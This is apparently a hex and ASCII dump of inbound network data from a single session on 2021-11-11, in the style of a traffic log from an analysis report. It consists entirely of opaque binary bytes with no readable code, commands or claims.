                                                                                                                                                                                2021-11-11 11:26:50 UTC7375INData Raw: bb 9f 7f dd d4 fd 3e 0c 9f c1 e6 68 93 e9 79 ba c5 bd 74 4a 56 bf e2 d6 c0 76 f6 4e 99 60 fd 6f d5 17 f1 d7 17 46 30 e6 ab 0e 9f 9e 74 a2 35 a5 73 56 36 06 b3 7a d5 e8 0d 59 0f 0f 26 1b 09 01 b2 34 fb 00 6e f0 72 1a 37 09 bc 51 83 e7 65 aa 84 ca 72 11 15 3f ca a7 3b 04 eb c1 91 a3 ec ab 45 7d a3 ae 2f f5 37 f6 99 3e e2 b6 af 9a 62 cd 9b 40 14 1c de 62 9b 26 37 e2 4b 14 b5 37 04 92 97 e7 92 b9 b5 9d 0d a0 7f 78 35 cb 38 4d 5f 03 ed 9e 51 b3 b5 33 47 01 bd d5 43 f1 f0 7d 6d 1b 7d 29 6c 93 e2 bb 0c a3 b4 a9 21 d7 f7 13 81 b6 5a b5 b9 da 80 2d 0b bd d9 7c 83 3e 71 67 39 d5 20 89 7f 21 b5 8c 43 3f 52 84 3e 1e ca 7d 81 68 9e e2 cd b1 28 5f 7c 23 d5 f4 5f 31 89 7c b4 58 c2 9e da cc 7e 1d a5 f1 a8 af 63 43 b5 8a 46 1b 72 84 21 6f 22 9a fe 05 8d 99 bd c3 b7 e1 69
                                                                                                                                                                                Data Ascii: >hytJVvN`oF0t5sV6zY&4nr7Qer?;E}/7>b@b&7K7x58M_Q3GC}m})l!Z-|>qg9 !C?R>}h(_|#_1|X~cCFr!o"i
                                                                                                                                                                                2021-11-11 11:26:50 UTC7379INData Raw: 6e ea 4b 80 db 96 fc b7 f5 d6 41 c4 4d f2 0c d3 1a c9 37 a5 7e a1 3d e1 59 0d 3a f4 77 c6 33 a1 a6 6e 27 d5 f5 9a 6e ec 28 20 4d 6d 0e 7c 47 e5 27 f6 b3 38 e8 ab 3f 9e 9d f6 01 84 5e 06 81 44 5f 0a 2c a5 ef d0 62 4d c9 ca e6 d1 81 f9 4e e5 d9 3f 43 0d dc f6 21 e5 f5 ea ff b1 89 e8 46 b9 69 30 4a e5 6d df 7b 7b d9 b2 7b fd 71 b9 f2 fd 55 c2 d1 97 18 aa 1d e5 e8 36 5c 6c 5d 8e f3 9d 59 0f 2a 91 f9 3e 5b 8d 5c f6 1c cd 34 c9 1d 25 68 de 6c ad b0 98 6d f7 85 85 4d 4d a3 7a 13 c7 09 c6 0c 91 66 2a 8f 94 69 07 35 e9 01 f6 b0 a1 cf b6 fe 9d 79 ad 7b f7 55 c0 67 97 fd e4 e6 cc 59 38 b6 fd 64 07 47 39 bf 87 67 25 4f 66 7b 53 60 cb 7b f1 4e c0 47 9c 63 d2 2d 81 6d 9e 87 a0 c9 e8 7b 7e 4b f6 51 05 9d 33 46 69 a7 fa 4a 6c 7c d7 7f f3 7a 92 7c 95 5f e6 5d 8d 1f 91 bb
                                                                                                                                                                                Data Ascii: nKAM7~=Y:w3n'n( Mm|G'8?^D_,bMN?C!Fi0Jm{{{qU6\l]Y*>[\4%hlmMMzf*i5y{UgY8dG9g%Of{S`{NGc-m{~KQ3FiJl|z|_]
                                                                                                                                                                                2021-11-11 11:26:50 UTC7383INData Raw: 2a f2 3c e3 73 71 1b fa 74 52 14 5c 55 51 65 2c 20 6b 8a 5d de 72 29 d3 fc 45 ab 38 7d 23 aa f9 7d f1 2a d0 7d d4 2a ba 7d bc 2a 9c 76 9e 63 6e 82 6e 3d b9 e4 56 85 60 d8 2f 8e 28 cc 04 7b e2 64 78 21 34 9e da d4 b9 30 0f 3f 4c 90 eb a3 35 d0 df 32 ff e1 5b ab ef 48 6c 83 64 71 44 17 43 ba 57 fb 8e ec a9 da 33 4e e1 03 b2 33 6c ef 45 04 f8 b6 44 e7 ff ad 46 fc 8b 1f 95 55 83 bc 44 de 55 e9 91 d9 a6 ed 4a db 21 8f 94 ec ab 8b b6 ac 96 29 73 dd 4e fb 37 6b 30 1c 8d e5 81 22 ba 52 88 7b 99 17 dd f1 3d 62 67 52 7d e8 5f af 99 c5 87 e5 91 b5 e6 14 8c 54 5a f3 4d e6 81 49 82 58 a1 2d 7b 96 53 c3 38 9a 25 cf 32 9e 30 cb 19 9c 06 cb 04 9c 11 ee fe c0 ed 28 a5 9c 22 6b 1d dd 97 98 79 65 17 9b 38 b6 e3 a1 bc 1a b6 07 77 b9 92 be 23 e5 e4 47 5a c4 ea 32 d4 47 d6 67
                                                                                                                                                                                Data Ascii: *<sqtR\UQe, k]r)E8}#}*}*}*vcnn=V`/({dx!40?L52[HldqDCW3N3lEDFUDUJ!)sN7k0"R{=bgR}_TZMIX-{S8%20("kye8w#GZ2Gg
                                                                                                                                                                                2021-11-11 11:26:50 UTC7386INData Raw: cc 46 39 10 23 c5 db bd 33 ba 7f 8e a6 c1 25 bc 32 31 4f dd fb 90 e1 03 a5 19 43 ed ed 09 b4 26 2e 45 a9 cc 64 7b 99 45 2f 41 9a 1e 8b b1 ef 96 7b fc 0d c6 4b d9 49 1a 53 22 e9 32 26 d1 21 c6 1b ed ef 66 26 e1 e9 c7 3f 11 af be db fc 31 26 4b fd a9 70 2b fc 99 a2 4b 41 41 70 6b fc 45 f6 4b 81 59 70 5f 81 34 ce 2b 91 55 b6 fd 91 20 86 17 8a 09 dd 13 92 f9 e5 8b 21 9a 7e 8b 11 cd d4 db 49 c1 7d fe f9 a9 1b b3 4c 99 da 9d 8a 89 c6 93 cf 58 e5 2b a1 3a fe 0a 91 ae 76 5b 56 41 10 2b cd 7d 9c 3b cb 21 a9 0b ba 2f 96 a0 c9 b6 66 c8 17 e9 05 f3 51 d9 12 61 01 ea 66 6b 71 cd 82 bb 03 a7 f5 8b fa cd 16 a0 49 b4 e6 8e a9 69 33 73 6c 59 ce 01 8b 49 cf 53 be 77 e5 d1 e1 9a be 8b d1 8d c8 1b 49 01 1e eb 23 01 fd fb 2a e1 75 cb fe b1 56 0e 83 b9 de 57 8a a9 dd b3 90 99
                                                                                                                                                                                Data Ascii: F9#3%21OC&.Ed{E/A{KIS"2&!f&?1&Kp+KAApkEKYp_4+U !~I}LX+:v[VA+};!/fQafkqIi3slYISwI#*uVW
                                                                                                                                                                                2021-11-11 11:26:50 UTC7391INData Raw: fa c8 fe 0a 35 24 5c 84 2b 1f 2d c8 d8 0d 96 43 41 ef 31 fa c9 d9 38 47 c7 09 da c0 d2 01 de 29 6e 1f 28 8a c6 33 42 2d 28 45 0e 9b 21 36 c7 40 f0 31 ce 29 51 ca ae ea 4c ff 78 e6 9c c6 53 6b 76 04 33 1f d5 53 41 cc 87 ea f5 0d 23 6b 24 f1 6f 65 ca 01 33 31 d6 21 1f 73 56 4a 28 fc 05 a9 49 2f 17 e5 1f 84 3a e7 b0 13 01 1e 28 99 29 ba 45 55 05 47 c0 b2 38 01 64 12 bf b8 d5 7b 6c 21 5f ab 84 e3 0c 01 3b 78 48 84 4c 12 e5 96 61 98 3f 66 34 2e 6e 30 01 ef bc 28 17 31 4e f7 35 2f 84 5c a0 0e c6 5c 24 e8 a4 0b c0 28 96 26 90 20 44 01 bf eb 62 dc 84 21 df b5 ff 4c d4 e3 b6 b2 45 ee a3 04 58 e1 12 31 c7 c4 d6 b2 7b c4 01 da dc 27 e7 b6 b9 63 01 ca 75 30 99 9b a8 11 9e 94 20 f1 45 40 f6 41 3c cb 44 c1 a2 17 48 13 13 2b 08 65 81 37 ce fc 5e ef 99 11 92 e2 32 1f e3
                                                                                                                                                                                Data Ascii: 5$\+-CA18G)n(3B-(E!6@1)QLxSkv3SA#k$oe31!sVJ(I/:()EUG8d{l!_;xHLa?f4.n0(1N5/\\$(& Db!LEX1{'cu0 E@A<DH+e7^2
                                                                                                                                                                                2021-11-11 11:26:50 UTC7395INData Raw: ab bd 46 aa 4e 0b 10 2b 34 03 08 3f 7f 0c 0c 73 83 33 04 61 c8 0a f6 7d e0 c0 dd ef 7f f5 28 71 74 d2 00 4c 5e 57 e5 7c 7f fe c8 00 53 65 6b f9 e4 e7 5f 29 3d b7 c9 80 56 eb ee 37 01 8d 9f 01 a5 33 16 19 62 2c b6 fc ce 5c 90 7e 25 89 53 99 72 ed 20 7b 57 fa d2 25 bb be a0 ba ad 3b d1 d4 90 8e 7d a9 00 b4 42 2b 2e 75 3f 18 2a 0f 23 b1 9a 9d 40 f5 a5 b7 ae 3c 24 d2 d5 76 4c c0 15 00 18 93 5d 12 24 21 af 9d b0 4e 04 26 49 5b 31 bf 80 1a f6 c0 58 18 6a 5d eb 70 56 20 00 f9 0b f8 86 6f 72 b4 7e 05 0c 1e df 6d 54 00 83 af 2f 41 33 c1 09 fc ff 43 0d e8 7a 1d 20 09 ae 78 04 16 00 de 8f 92 11 db 96 2a a7 2a 9a 92 00 a3 31 6c 6f e7 b1 02 35 47 3a c8 5f 62 72 4a 01 04 92 cd d0 41 0b 99 ec 98 26 a0 90 4c 16 98 16 c1 70 17 1a 61 2b 43 b0 89 bc 86 b2 d0 12 e9 84 37 46
                                                                                                                                                                                Data Ascii: FN+4?s3a}(qtL^W|Sek_)=V73b,\~%Sr {W%;}B+.u?*#@<$vL]$!N&I[1Xj]pV or~mT/A3Cz x**1lo5G:_brJA&Lpa+C7F
                                                                                                                                                                                2021-11-11 11:26:50 UTC7399INData Raw: 8c d0 9d 32 0a e9 c2 84 ab ee 47 36 04 03 01 ec 9a 1b 04 b2 58 f9 60 e1 6a 03 1b ca 67 07 84 a3 d2 1c 31 5a 92 95 04 82 45 fa 88 86 13 00 f0 2a e3 90 ee f2 61 33 07 a0 f6 ca 10 db 20 c7 b0 b3 ff 32 88 0a d1 b9 e2 dc 6a 84 00 62 a6 d8 49 f6 ca 24 ab 7c 9f 65 fe 00 2a 68 e0 42 81 bf 7b 59 03 d0 38 14 31 2b 29 55 96 80 38 dd 57 cd 97 25 76 13 5d 18 8e a8 70 06 52 a5 c9 fe b4 24 58 28 ae 40 e9 45 f8 4e 90 34 98 67 60 7c 19 86 a6 d3 ff 98 38 1e c3 63 7f 40 a8 15 95 19 ad 83 3a 51 0e dc 99 7a 0b 79 cf 10 25 02 61 98 17 03 bf 96 00 54 47 e8 a8 3d eb 25 5a 00 45 7f f2 0a 29 d3 3e 0e 09 46 e9 31 96 21 28 92 a0 26 00 90 3f 38 82 c2 9e 22 e2 76 bd a2 dd 81 60 87 f1 87 03 1e fc f1 10 e6 6a 1d a7 d0 cf 28 08 8b 05 b2 d6 da 76 01 02 09 44 22 18 dc 46 00 bd e3 11 b2 66
                                                                                                                                                                                Data Ascii: 2G6X`jg1ZE*a3 2jbI$|e*hB{Y81+)U8W%v]pR$X(@EN4g`|8c@:Qzy%aTG=%ZE)>F1!(&?8"v`j(vD"Ff
                                                                                                                                                                                2021-11-11 11:26:50 UTC7403INData Raw: 66 49 c6 fb f0 04 10 97 31 17 08 cf 2f 18 0c 2e e8 15 7e f7 c2 01 ff 79 15 00 04 58 13 80 b3 74 c6 0b d5 3d 1f 10 d0 c7 05 13 fb 0d 32 99 f7 12 57 ec 31 9d 71 be a5 f1 51 12 f2 d4 a7 d1 59 31 f7 6a 32 c2 e7 81 27 09 ff b8 c2 5f 14 50 9e 2b af 16 6a 2d bb 0a 98 5b c2 1f 8a d0 61 97 c5 be 09 89 fb 76 4f 24 57 27 d9 fe bd 70 97 99 a9 29 68 10 27 b9 47 55 12 e3 c9 f0 3b 89 e6 82 88 31 db 29 f3 d9 1d 88 c7 08 a8 93 c8 aa 28 a7 24 bd be c2 6e 14 2c 12 a6 be f9 62 e9 3f 5e f0 50 50 25 a4 b2 c9 2e 2a e6 b0 84 40 86 cb 22 c1 1c f8 c9 a1 06 c6 44 8a a8 dc d3 a8 7d c0 29 f9 89 d1 58 c1 9a e2 0f 85 4f 14 27 41 b4 34 44 31 da f6 c7 4b cc 0a 29 56 ca 4b 29 01 45 96 ea 88 e3 e1 42 40 32 d9 b8 20 45 44 27 98 28 f1 40 a6 a5 64 b9 9a 6d ec 33 a4 ef 8d b9 2b a6 a5 29 c6 6c
                                                                                                                                                                                Data Ascii: fI1/.~yXt=2W1qQY1j2'_P+j-[avO$W'p)h'GU;1)($n,b?^PP%.*@"D})XO'A4D1K)VK)EB@2 ED'(@dm3+)l
                                                                                                                                                                                2021-11-11 11:26:50 UTC7407INData Raw: 11 23 29 20 ae b1 f7 c1 41 05 53 46 d4 0f 12 1f c0 00 c0 b6 44 33 36 77 fe db 7a ed 00 3c d3 d6 17 e1 6f 81 75 3f 03 3e 00 b8 82 10 22 16 a4 c4 79 c7 00 0b e4 f6 e5 73 5b 5e d6 7f a0 06 34 3a c8 c2 c5 20 3b bb cd 00 50 38 3b b3 7d 01 13 4e 79 fc 9f 4f a7 71 cb 31 14 e5 7a 33 04 bf 93 5c ce 58 e9 34 8b 09 d7 96 b4 4f 3e b2 b2 62 1c c1 af d1 6d 49 02 c2 21 39 d8 ab 96 0b c9 fd 9b f2 34 28 66 56 ba 29 42 c2 57 a1 2b 66 89 38 3f f2 cb 8e b8 1c 21 9c 09 38 42 5b 1c 7d d2 25 ad 22 c8 97 bf a7 0f 71 bf 8b 09 c8 53 40 b4 6c d2 29 c3 9e 66 97 c5 1f a6 65 b9 27 eb db e4 2d 70 90 bf 6c 8a ec 2e a1 06 e9 65 8d 7e d9 90 d9 06 da 76 08 58 8b 38 b5 6e a4 ad 07 11 05 41 8c 69 14 c5 09 02 a3 d8 4f cd 7e 72 b0 5b bc a6 c5 ea 09 85 4c 84 d7 72 cd b3 79 3c 93 cf 8d 71 7e d8
                                                                                                                                                                                Data Ascii: #) ASFD36wz<ou?>"ys[^4: ;P8;}NyOq1z3\X4O>bmI!94(fV)BW+f8?!8B[}%"qS@l)fe'-pl.e~vX8nAiO~r[Lry<q~
                                                                                                                                                                                2021-11-11 11:26:50 UTC7411INData Raw: 50 aa 4f b1 46 3e 98 18 f7 58 b8 66 df 68 d9 99 54 cf bf 25 73 b3 97 bf 32 25 09 4c 7b 51 ff f8 37 51 3e c7 27 da 73 ae 13 f2 88 6f fe 2d 8a 19 71 7c 13 43 a3 11 4b e6 9d 4e ec b2 f7 74 d2 c2 bd 19 7d 18 f9 21 ca b7 18 7a 29 da b0 3c b5 46 1c f4 d7 05 58 89 03 e9 1a 18 3d b4 d2 21 9f cc 7c 50 ef 6b 58 97 c6 30 9f 41 df fe 3d 10 89 fa c2 c9 55 ba 5d c6 13 27 b0 a2 c4 88 27 29 d2 54 67 c9 ff 1b 1d fa d6 4c 2f 4f e1 ec 59 e1 ce 20 3c 10 a4 a3 76 70 4a 03 ec db d4 04 c9 35 f4 f1 cb 92 0b 73 3d a7 7b ed 11 b3 5a b0 63 1b 96 5a e9 57 49 a4 ee 3c 16 c9 09 32 ba 7f 4c 59 a2 91 7c 19 e9 29 8e fe 06 52 31 b4 ca 41 62 03 3e 40 da 01 87 cf 4c 47 0e c9 05 19 59 d6 2d 9f df e8 52 7f 09 e4 fa 99 91 93 01 08 32 24 bb a7 d8 66 32 d3 aa e2 62 c9 ea fe 5b 5a 57 68 88 da 2d
                                                                                                                                                                                Data Ascii: POF>XfhT%s2%L{Q7Q>'so-q|CKNt}!z)<FX=!|PkX0A=U]'')TgL/OY <vpJ5s={ZcZWI<2LY|)R1Ab>@LGY-R2$f2b[ZWh-
                                                                                                                                                                                2021-11-11 11:26:50 UTC7415INData Raw: 9b 99 09 31 cf 32 af c2 a8 79 03 88 e7 40 99 09 68 f2 29 e9 84 c1 b3 a6 0e 9e 85 d6 21 da a1 21 7a 12 57 9d 43 2a a6 27 26 e2 45 64 c0 92 0c 2d 55 9e 79 bf 09 2e 5e 85 e2 01 d6 fd 86 9d fa 32 4c 25 cc c2 f8 31 ce 91 22 89 70 bb 3b b3 7a 0a 25 1c 2c 93 04 dc 8b 31 4b fe 30 34 89 de be a0 69 ba 0a bd 9a c5 d9 a4 ad e2 19 f4 bd 51 f2 09 36 39 2a ce 7d 4a d8 c8 5b 01 5f f9 a8 5b 25 f2 c5 51 a5 c2 40 d5 9a 57 59 e8 05 21 d3 8b 25 18 ef 62 1b ee 5f 51 38 42 05 0c 81 7e c2 01 de 3f 0b d3 08 89 68 fe cc 25 61 99 1f 26 92 4d 5e 5e 29 e4 2d e3 d0 a9 56 a9 4e f1 67 6a a1 a4 62 e0 89 05 7f b6 03 6f 16 7a b7 a6 25 5b e2 0e 19 2b 13 28 30 7b 54 04 6d 16 9c b8 df 80 21 12 9c 01 49 e8 5f c2 ad f6 55 50 f1 24 97 45 65 2f f0 3e c5 ea ce 04 ca cd 5f a0 66 c2 58 b8 dd b1 e9
                                                                                                                                                                                Data Ascii: 12y@h)!!zWC*'&Ed-Uy.^2L%1"p;z%,1K04iQ69*}J[_[%Q@WY!%b_Q8B~?h%a&M^^)-VNgjboz%[+(0{Tm!I_UP$Ee/>_fX
                                                                                                                                                                                2021-11-11 11:26:50 UTC7418INData Raw: c6 a6 e7 51 1a f1 a7 1e 38 3f 31 de 7d 58 3a 40 93 25 27 dd b3 b7 b2 2f a9 0e 56 1f c2 29 32 7f 6c 70 27 fe be f7 96 8f 5a c6 bc c6 b6 18 bd 79 1b 6b 62 9f db 15 b4 e8 e2 81 9a 96 6e b4 aa c8 73 6b a4 a1 2c 05 c8 b3 2d d3 92 27 5c f0 62 ce 40 4c 1c 21 c3 24 1d f6 a2 7c 09 fc c1 95 9c aa bd 12 67 92 08 5e 04 6e c4 c1 0e b3 b5 13 21 c7 4b 1f eb d6 c3 69 09 55 c6 e3 95 a9 0b d4 8d d2 46 ba 3b 33 0e 12 c8 2d ab 99 d7 ee 6e 84 57 80 24 09 31 d0 2d 16 d2 f3 2b f3 d3 69 18 96 fb b8 be 9e 5e e9 54 48 9e e7 67 ce d7 2f 09 f0 1a b9 f6 f7 14 c0 0a 81 29 d0 8b 1a 7a 22 11 01 d6 23 04 31 c8 05 eb 2c 84 25 95 11 e9 d6 c9 d8 59 e2 04 ce bb b3 fc 17 c1 0a 28 9f 8b 13 11 29 c6 b9 a2 da 4e fd c5 dd 17 e3 29 49 72 b5 8b 36 f5 ba 17 57 6c 22 72 b7 e7 cd 3e 2a e8 5d 96 33 5e
                                                                                                                                                                                Data Ascii: Q8?1}X:@%'/V)2lp'Zykbnsk,-'\b@L!$|g^n!KiUF;3-nW$1-+i^THg/)z"#1,%Y()N)Ir6Wl"r>*]3^
                                                                                                                                                                                2021-11-11 11:26:50 UTC7423INData Raw: 89 0b 7c dc c2 5b c6 df 08 02 25 5f 5d 40 8e a6 50 58 37 28 74 00 57 67 32 30 bd 27 61 e1 16 4e 02 3e 00 76 9c b3 ef 05 a7 01 fd fc 85 9e a6 24 dc 22 e4 04 10 6f 60 a5 81 65 ab ba 3d 96 03 e7 4b e9 1a a0 18 8d bb 65 b5 3d 53 d0 15 e5 61 0b a6 32 0a 01 31 b4 20 d2 ca 70 3a a7 01 f6 00 88 56 66 68 df 5f 0e 52 03 5e 67 12 d8 08 37 00 20 38 81 cb 54 46 91 29 00 5c 65 ea 12 3b 75 9c 8e 05 3c e9 b6 bd 35 e0 8d 9f c0 36 b5 c4 6d 36 24 1f 96 7d 4d 46 be 22 2d 24 18 8a 5e 34 0a 3c 2f 40 31 94 2c 1a 2a 3e 96 96 a0 82 ef 05 c4 f6 9c fb 66 80 3e f1 53 6b bc 21 01 5a 0f 61 35 6f fc 2f 40 00 b6 56 b4 ab 4f ca 83 5b e3 d0 70 72 16 e9 fb 8f 43 1a e5 69 10 50 d0 cc 42 00 14 17 05 35 37 4b 7f 5b 03 cc 15 82 79 d8 64 90 1c c2 83 b8 e9 04 03 fb 01 4e 08 80 ee 05 e9 e7 33 82
                                                                                                                                                                                Data Ascii: |[%_]@PX7(tWg20'aN>v$"o`e=Ke=Sa21 p:Vfh_R^g7 8TF)\e;u<56m6$}MF"-$^4</@1,*>f>Sk!Za5o/@VO[prCiPB57K[ydN3
                                                                                                                                                                                2021-11-11 11:26:50 UTC7427INData Raw: d2 30 78 97 2e f4 25 0e ab 63 00 1c 5b f7 a6 dd 36 a8 3c bf a1 30 86 df 0a 51 80 7f 49 80 94 8d 03 cc 2a a4 54 c7 42 2f 04 64 81 80 f5 91 d4 e9 27 55 cf 60 8c ce 88 a2 f8 57 cd c0 2f a4 ab 10 bf 74 db ae 8a c8 8e 04 1c 23 0e ff 32 43 30 8f 02 94 95 fd bf 62 46 c6 82 23 31 da c2 e4 5d f1 27 ad f1 53 25 d7 91 49 fa f6 89 bd f4 cd 52 d7 22 4d 0e be 77 6e 78 ef 66 4b 4f a6 d7 4a bc 4e 5e a2 2b 87 e8 21 db 32 2a 4b b8 c5 04 4c 05 af 5e d2 ef ba 2d af 6a 98 04 fa 35 01 c7 5a fa 0b e4 ea 5f 94 ac 98 49 9d f6 82 6f 16 ae ca af 12 21 c7 eb 1d bb 13 20 bc 34 a4 aa dd e7 c9 c8 2a b0 57 d2 97 fb d4 a0 1a fd d7 f0 0e ad af 29 69 38 0e 2c be 97 fa bc 29 d3 fa 25 11 fe 05 82 c6 13 fd 74 88 d2 17 22 e2 d7 93 ef 12 cd ba 8d 76 60 2b 47 13 61 a8 32 28 8e 1c 89 0d 76 21 5f
                                                                                                                                                                                Data Ascii: 0x.%c[6<0QI*TB/d'U`W/t#2C0bF#1]'S%IR"MwnxfKOJN^+!2*KL^-j5Z_Io! 4*W)i8,)%t"v`+Ga2(v!_
                                                                                                                                                                                2021-11-11 11:26:50 UTC7431INData Raw: b5 ae d1 91 21 df 26 8b 7a 5b fa cd ca 3f 56 bd e0 b9 1b 9d 19 a5 d7 38 21 2f c6 de 1e 52 5e eb 42 35 28 29 02 27 01 d8 55 f3 82 25 a9 5f d1 4c a6 0f 8b 21 f9 f5 b2 ae ff f1 8a 9f f7 ff ad 24 ee 06 24 03 18 7a 05 75 72 65 02 d7 e8 29 c1 79 d2 8a 01 d1 26 bb 8b 18 31 cf 75 cc 89 4a 28 e2 b6 93 52 3a f2 97 58 67 17 29 f7 ff 8c 14 16 95 f1 7b 95 35 62 12 eb 05 f2 1a d3 59 63 f6 d7 a2 70 44 99 9b 8a 8b 33 46 44 21 82 60 eb 7b a2 3b 4b 29 1d 0c 35 33 2d ff e2 57 3c 29 95 14 51 13 01 e8 50 a5 27 25 d5 2a 76 8d 1e 27 89 10 f7 be 46 ca 2f 3a 59 44 5a ef dc 05 0b a1 61 2a 7f b2 41 c8 02 69 c2 f2 57 45 be 27 5c 76 d2 f6 11 27 f5 3b c1 05 24 28 2d 53 7d 32 0f 29 09 7d e5 21 96 0b fa de 5c 78 5b 1a ea 2c 92 e1 1d 4c e9 22 80 15 0b 4e 2a 11 08 00 43 5a a8 7c e6 41 be
                                                                                                                                                                                Data Ascii: !&z[?V8!/R^B5()'U%_L!$$zure)y&1uJ(R:Xg){5bYcpD3FD!`{;K)53-W<)QP'%*v'F/:YDZa*AiWE'\v';$(-S}2)}!\x[,L"N*CZ|A
                                                                                                                                                                                2021-11-11 11:26:50 UTC7435INData Raw: db 53 8b ce 28 53 ab 29 fa 9f c6 a5 f1 3a 40 01 cf 31 03 90 85 51 25 19 dd ca 2c 6a d2 ac e3 5e a6 a8 29 f2 a5 2e 36 17 e2 cd 29 04 c9 fb 39 c5 28 36 d2 ee 94 23 cf 51 12 8b 0e e8 87 d2 31 bc 21 f7 3e ce 50 05 e0 e9 d8 78 91 9e 72 50 70 21 9d 1c f2 d3 45 43 d0 75 13 b7 94 80 58 d9 23 56 0b 2b 52 c4 6c 81 3a a7 e1 39 00 73 7f 38 e0 de 1f e0 5e 45 8b 85 d1 c0 27 6c 78 d6 0a ee df c4 38 08 70 86 97 51 4d 69 7d 30 6e 33 31 ac 14 41 29 2b ac 94 d6 ee cf be c9 08 f4 a1 e2 2b 0a 5d 65 ef 15 0e 40 89 09 7f 16 3b 04 26 2c 6c 20 74 aa ac 5c e2 dd 7d be d0 cb 80 eb 55 b2 b3 7d 3b 8e 4e 07 ea 41 86 66 2d 6c b1 46 aa 16 62 e8 4a 18 9c d5 65 a5 4d 65 2a a9 82 e4 fb 6c 11 13 bd dc fb 71 b8 4a 84 12 20 0e fa 64 32 ae 2d c1 cb 85 bb f3 04 d4 16 cf 0a 00 f1 9c 9d 2b 35 ac
                                                                                                                                                                                Data Ascii: S(S):@1Q%,j^).6)9(6#Q1!>PxrPp!ECuX#V+Rl:9s8^E'lx8pQMi}0n31A)++]e@;&,l t\}U};NAf-lFbJeMe*lqJ d2-+5
                                                                                                                                                                                2021-11-11 11:26:50 UTC7439INData Raw: f7 40 14 63 50 eb 0b 21 4b 30 62 dc c7 fd 4c 2f 5f c9 e2 91 d2 d8 62 02 0d 73 b0 ec 3c 24 08 65 29 4e cf 32 c2 21 5f 1a 7b f7 f0 3c 4a ce ea cc bd c7 a6 f3 5c c3 d1 05 5a 12 99 26 eb b2 15 62 5c 01 f3 a5 8e eb 49 0c d7 d0 56 95 45 76 8a eb 01 f9 60 31 bb 08 c8 4f 82 bc 55 a4 aa 33 86 ce 12 1e 01 c6 eb dc 82 f6 95 74 61 52 ab 34 79 67 43 69 58 5b 50 c9 63 8e 0e 09 d6 d3 be cd 15 43 f3 29 f5 fe 91 90 09 f6 2a be 17 1a e3 d3 5f dc 47 0d 88 d3 20 25 e9 51 51 d7 4e cb c6 fd c5 16 a2 3f bf f4 10 e8 88 27 d9 c4 6f f3 fd db 91 07 5f f6 bd 17 c3 01 e7 1e 69 96 7d 65 95 09 fe b9 77 c5 ec 25 f1 77 02 31 df 09 c6 5f ec c3 2a c9 24 78 45 40 7f bc 6f d2 ee d8 ba 01 52 f1 0f 27 ea de 20 09 c9 1c 94 bf 9e 0c 25 14 be b7 e1 ca c9 34 03 09 89 bf 6f 8b 9e 5f d2 65 0a 75 14
                                                                                                                                                                                Data Ascii: @cP!K0bL/_bs<$e)N2!_{<J\Z&b\IVEv`1OU3taR4ygCiX[PcC)*_G %QQN?'o_i}ew%w1_*$xE@oR' %4o_eu
                                                                                                                                                                                2021-11-11 11:26:50 UTC7443INData Raw: 40 64 09 18 bb 1e 78 2b 83 05 54 0f 31 1f 4b ee fd 4c 4e da a2 90 4c 0c 21 c1 af 89 01 11 b9 0b 30 32 d9 97 bc c7 0b c6 b2 ec d1 b4 8c 09 f6 77 c3 95 7b ed aa fb 9d 4c 56 75 89 bf b1 6f c9 a0 0b ed cb aa cf fe 74 6f 09 d6 4b 31 5f 15 f3 5c 9a 5e 65 ed 93 eb 61 21 f7 28 68 15 a4 d6 92 96 4a e7 ee 8a 5a 5e f3 f1 09 29 c9 bf de 67 cb 31 c8 f6 20 ff b8 9d f7 3a 51 77 5c 85 c2 31 c7 a9 b0 ee f3 25 09 d6 44 08 bf 11 5b 05 73 3d 26 d0 0f c0 ea c8 c5 fa 5e 23 53 97 2d 68 2f a8 e5 b5 fe 30 ab 01 16 09 55 f9 3e 31 7b 3b 8d be 44 02 f8 f2 96 f9 ce 5f 10 f6 b3 e4 fc bf 25 d3 ec 5a 52 e7 f8 38 ba 5f ca e1 27 0b ba 69 79 62 a5 f0 57 82 fa 0b a6 94 0b 76 21 4a 25 8b e1 6b 26 7d e5 bd 95 f6 06 4f 88 f4 8b 5a 1a ff 57 3b 13 10 2c c6 1e 9d 81 14 07 ac 21 00 a4 9e 31 e0 b2
                                                                                                                                                                                Data Ascii: @dx+T1KLNL!02w{LVuotoK1_\^ea!(hJZ^)g1 :Qw\1%D[s=&^#S-h/0U>1{;D_%ZR8_'iybWv!J%k&}OZW;,!1
                                                                                                                                                                                2021-11-11 11:26:50 UTC7447INData Raw: a3 57 10 d0 25 84 2b 0e af a3 ae 4f a3 11 30 d7 7a a4 e4 2d 5b 69 74 7a ae e2 dc 12 21 0e 61 9d 09 ff 3e b3 b8 93 32 1b 0d 82 7a 09 c0 d1 24 92 cb b0 cd cf 95 49 6b 05 4c 90 f0 b5 6d d1 8f 31 c8 49 1a 72 44 bd 76 47 50 f7 20 97 9e f0 00 e1 86 90 62 e4 76 a7 69 00 b0 07 7d b3 db f1 6d bd 0f 16 7e 5d 47 f2 ea f7 a7 93 a0 b4 01 bf e6 c1 f0 02 b7 51 65 8e e9 fa 1c 2d fd 3e 5a f0 06 97 57 bb ce d5 fa a7 7c 82 0f b6 1e f3 8f ef 0a 3e 2f ef 44 01 c3 81 47 39 fb 9a b8 a3 af 31 16 8b 5f 45 90 74 1a 03 1e 76 05 14 5d 45 51 29 3b 76 3d a6 f9 4a c7 c2 1e 80 fb 82 c0 85 3f be bb 56 02 5a ad 6f e7 cd c9 17 dd 94 0f 82 17 77 4d 4a 1c 0b 38 44 03 97 d8 3a 5a 10 92 52 58 2b 54 21 49 7d 1e 3a bc 44 e9 fe cf 49 fd 67 66 a7 5d 96 a6 04 c7 d3 ae 3c 5e fb 9c a7 09 95 7c 54 79
                                                                                                                                                                                Data Ascii: W%+O0z-[itz!a>2z$IkLm1IrDvGP bvi}m~]GQe->ZW|>/DG91_Etv]EQ);v=J?VZowMJ8D:ZRX+T!I}:DIgf]<^|Ty
